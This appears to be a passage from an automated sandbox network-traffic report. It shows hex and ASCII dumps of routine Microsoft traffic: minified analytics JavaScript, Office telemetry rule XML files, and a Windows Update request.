                                                                                                                                                                          2024-11-23 18:02:00 UTC16384INData Raw: 22 2b 74 5d 29 3f 6e 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26
                                                                                                                                                                          Data Ascii: "+t])?n(i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&
                                                                                                                                                                          2024-11-23 18:02:00 UTC16384INData Raw: 74 69 6f 6e 20 67 63 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75
                                                                                                                                                                          Data Ascii: tion gc(e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,fu
                                                                                                                                                                          2024-11-23 18:02:00 UTC16384INData Raw: 29 2c 68 28 29 2c 6d 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f
                                                                                                                                                                          Data Ascii: ),h(),m(e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reaso
                                                                                                                                                                          2024-11-23 18:02:01 UTC16384INData Raw: 28 7b 4e 6f 72 6d 61 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74
                                                                                                                                                                          Data Ascii: ({Normal:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}ret
                                                                                                                                                                          2024-11-23 18:02:01 UTC16384INData Raw: 28 6f 2c 22 41 75 74 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75
                                                                                                                                                                          Data Ascii: (o,"Auto track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=fu
                                                                                                                                                                          2024-11-23 18:02:01 UTC16384INData Raw: 63 6f 6e 66 69 67 2e 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73
                                                                                                                                                                          Data Ascii: config.coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._s
                                                                                                                                                                          2024-11-23 18:02:01 UTC16384INData Raw: 65 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74
                                                                                                                                                                          Data Ascii: e)return!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t
                                                                                                                                                                          2024-11-23 18:02:01 UTC16384INData Raw: 67 3d 22 57 65 62 41 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22
                                                                                                                                                                          Data Ascii: g="WebAuthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split"
                                                                                                                                                                          2024-11-23 18:02:01 UTC16384INData Raw: 61 28 65 5b 6d 76 5d 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f
                                                                                                                                                                          Data Ascii: a(e[mv])),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          86192.168.2.54981913.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:02 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:02 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 419
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                          ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                          x-ms-request-id: 38897bff-401e-000a-368c-3a4a7b000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180202Z-174c587ffdftv9hphC1TEBm29w000000039g000000001nhk
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:02 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          87192.168.2.54982013.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:02 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:02 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 472
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                          ETag: "0x8DC582B984BF177"
                                                                                                                                                                          x-ms-request-id: 80be2a3e-601e-003d-77f5-3c6f25000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180202Z-178bfbc474bwh9gmhC1NYCy3rs00000004t000000000mha6
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:02 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          88192.168.2.54982113.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:02 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:02 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 405
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                          ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                          x-ms-request-id: c9b33041-e01e-0033-176b-3b4695000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180202Z-178bfbc474bscnbchC1NYCe7eg00000004xg00000000cg41
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:02 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          89192.168.2.54982413.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:02 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:02 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                          ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                          x-ms-request-id: 26217b89-b01e-001e-808c-3a0214000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180202Z-178bfbc474bbcwv4hC1NYCypys00000004rg000000003sxs
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:02 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          90192.168.2.54982513.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:02 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:02 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 174
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                          ETag: "0x8DC582B91D80E15"
                                                                                                                                                                          x-ms-request-id: 5556881b-d01e-008e-6531-3c387a000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180202Z-178bfbc474bwh9gmhC1NYCy3rs00000004tg00000000haeu
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:02 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          91192.168.2.54983152.149.20.212443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:03 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=bGZxU9wu8Nf8x8+&MD=5Ek2bgCM HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                          Host: slscr.update.microsoft.com
                                                                                                                                                                          2024-11-23 18:02:04 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                          Cache-Control: no-cache
